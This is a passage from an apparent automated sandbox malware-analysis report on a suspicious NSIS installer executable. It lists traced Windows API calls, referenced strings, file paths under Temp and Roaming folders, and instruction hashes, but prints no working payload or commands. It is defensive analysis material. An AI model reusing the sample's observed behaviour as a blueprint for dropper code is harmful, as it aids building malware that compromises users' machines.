                                        • ShowWindow.USER32(?,00000008), ref: 0040570E
                                        • ShowWindow.USER32(00000008), ref: 00405754
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                        • CreatePopupMenu.USER32 ref: 00405799
                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                        • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                        • OpenClipboard.USER32(00000000), ref: 00405833
                                        • EmptyClipboard.USER32 ref: 00405839
                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                        • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                        • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                        • CloseClipboard.USER32 ref: 0040588A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID:
                                        • API String ID: 590372296-0
                                        • Opcode ID: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                        • Opcode Fuzzy Hash: 6894e9f90bc875501daf67bea02dd23ffdb3990ae2fac1508e671bbf89fa6b9e
                                        • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68

                                        Control-flow Graph
                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405A78
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AC0
                                        • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AE1
                                        • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AE7
                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"), ref: 00405AF8
                                        • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                        • FindClose.KERNELBASE(00000000), ref: 00405BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb535E.tmp$\*.*
                                        • API String ID: 2035342205-3955254049
                                        • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                        • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                        • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                        APIs
                                        • FindFirstFileA.KERNELBASE(74DF3410,0042BCD8,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00405D50,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,C:\Users\user\AppData\Local\Temp\nsb535E.tmp,74DF3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                        • FindClose.KERNELBASE(00000000), ref: 00406637
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsb535E.tmp, xrefs: 00406620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsb535E.tmp
                                        • API String ID: 2295610775-3133259053
                                        • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                        • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                        • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC

                                        Control-flow Graph
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                        • ShowWindow.USER32(?), ref: 00403E8F
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                        • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                        • DestroyWindow.USER32 ref: 00403ECE
                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                        • GetDlgItem.USER32(?,?), ref: 00403F06
                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                        • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                        • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                        • ShowWindow.USER32(00000000,?), ref: 00404108
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                        • EnableWindow.USER32(?,?), ref: 00404135
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                        • EnableMenuItem.USER32(00000000), ref: 00404152
                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                        • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                        • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                        • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                        Strings
                                        • Click Next to continue., xrefs: 004040B0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID: Click Next to continue.
                                        • API String ID: 121052019-3768601390
                                        • Opcode ID: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                        • Opcode Fuzzy Hash: 6d7623d9db7cd4b2b8523d1bb3db3e3d74f302aff2fe3ff677a931fada95a4e0
                                        • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D

                                        Control-flow Graph
                                        APIs
                                          • Part of subcall function 004066B5: GetModuleHandleA.KERNEL32(?,00000000,?,0040351A,0000000C), ref: 004066C7
                                          • Part of subcall function 004066B5: GetProcAddress.KERNEL32(00000000,?), ref: 004066E2
                                        • lstrcatA.KERNEL32(1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403B11
                                        • lstrlenA.KERNEL32(0042DFC0,?,?,?,0042DFC0,00000000,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,1033,0042A488,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A488,00000000,00000002,74DF3410), ref: 00403B86
                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403B99
                                        • GetFileAttributesA.KERNEL32(0042DFC0,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403BA4
                                        • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate), ref: 00403BED
                                          • Part of subcall function 004061EB: wsprintfA.USER32 ref: 004061F8
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403C2A
                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C42
                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C77
                                        • ShowWindow.USER32(00000005,00000000,?,"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe",0000000A,0000000C), ref: 00403CAD
                                        • GetClassInfoA.USER32(00000000,RichEdit20A,0042E7C0), ref: 00403CD9
                                        • GetClassInfoA.USER32(00000000,RichEdit,0042E7C0), ref: 00403CE6
                                        • RegisterClassA.USER32(0042E7C0), ref: 00403CEF
                                        • DialogBoxParamA.USER32(?,00000000,00403E33,00000000), ref: 00403D0E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 1975747703-3756021822
                                        • Opcode ID: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                        • Opcode Fuzzy Hash: 9de4ba4982955c39501ca71976a9485f8cd52ade1bb06ecee508862ffe36d889
                                        • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D

                                        Control-flow Graph
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00402F42
                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,00000400,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00402F5E
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        • GetFileSize.KERNEL32(00000000,00000000,IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe,80000000,00000003,?,?,00403722,?,?,00000008), ref: 00402FAA
                                        • GlobalAlloc.KERNELBASE(00000040,00000008,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 004030E0
                                        Strings
                                        • Error launching installer, xrefs: 00402F81
                                        • 8TA, xrefs: 00402FBF
                                        • "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe", xrefs: 00402F37
                                        • IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, xrefs: 00402F9E
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F38
                                        • Null, xrefs: 00403028
                                        • C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, xrefs: 00402F48, 00402F57, 00402F6B, 00402F8B
                                        • Inst, xrefs: 00403016
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                        • soft, xrefs: 0040301F
                                        • C:\Users\user\Desktop, xrefs: 00402F8C, 00402F91, 00402F97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"$8TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Error launching installer$IMG635673567357735773573757875883587935775753Bjlkeloftet.exe$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                        • API String ID: 2803837635-4264440587
                                        • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                        • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                        • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D

                                        Control-flow Graph
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                        • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00000000), ref: 00406468
                                        • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064C7
                                        • CoTaskMemFree.OLE32(00000000,?,T@,00000007,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064D0
                                        • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000), ref: 004064F4
                                        • lstrlenA.KERNEL32(0042DFC0,?,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00405409,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00000000,00424440,74DF23A0), ref: 00406546
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: T@$Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-1635558900
                                        • Opcode ID: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                        • Opcode Fuzzy Hash: d0ff790806609fa8110423ddf0d31832cd3c7fba7b22f484d1795f71742cc0e8
                                        • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 40177e omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,00000031), ref: 004017BD
                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate,00000000,00000000,00000031), ref: 004017E7
                                          • Part of subcall function 0040628D: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,0040357B,0042E820,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040629A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                          • Part of subcall function 004053D1: lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                          • Part of subcall function 004053D1: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                          • Part of subcall function 004053D1: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                          • Part of subcall function 004053D1: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsv507D.tmp$C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll$C:\Users\user\AppData\Roaming\chlorenchyma\Regenerate$Call
                                        • API String ID: 1941528284-524360879
                                        • Opcode ID: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction ID: a1f186b67c4edeb34fad59b9cedf70daa635d1c2101920768012b0df21243cfe
                                        • Opcode Fuzzy Hash: 0acf61fd71f3edde6b321a3403c7c5eac4b41d6d52f200133c1c8b0501db61a2
                                        • Instruction Fuzzy Hash: 6041C331900515BBCB107BA5CD46EAF3A78DF05328F20823FF526F11E2D67C8A519AAD

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 4053d1 omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                        • lstrlenA.KERNEL32(004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,004032C3,004032C3,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,00000000,00424440,74DF23A0), ref: 0040542D
                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll), ref: 0040543F
                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
                                        • API String ID: 2531174081-1451998560
                                        • Opcode ID: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                        • Opcode Fuzzy Hash: 04eedc2ba923f0a8d7eb9848a27cab945aaff25bd16a1fb9afb004099d42d10e
                                        • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 403168 omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055853284.0000000000443000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_IMG635673567357735773573757875883587935775753Bjlkeloftet.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: ... %d%%$@DB
                                        • API String ID: 551687249-1316549817
                                        • Opcode ID: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction ID: 381bea1cd078569db79acba847b1f3aad866332683383cfda6df38e9538e1e3d
                                        • Opcode Fuzzy Hash: bbbdf68c611b1039cd3d8d859c56e524a634e556e3416af6923e642436e137c0
                                        • Instruction Fuzzy Hash: 91513D71800219EBDB10DF65DA84B9E7BB8EB5535AF14417BEC00B72D0CB789A50CBA9

                                        Control-flow Graph

                                        [Control-flow graph image of the function at 406647 omitted; basic blocks were marked Executed or Not Executed]
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                        • wsprintfA.USER32 ref: 00406697
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004066AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2055762602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2055750603.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055774500.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2055785638.0000000000431000.00000004.00000001.01000000.00000003.sdmp
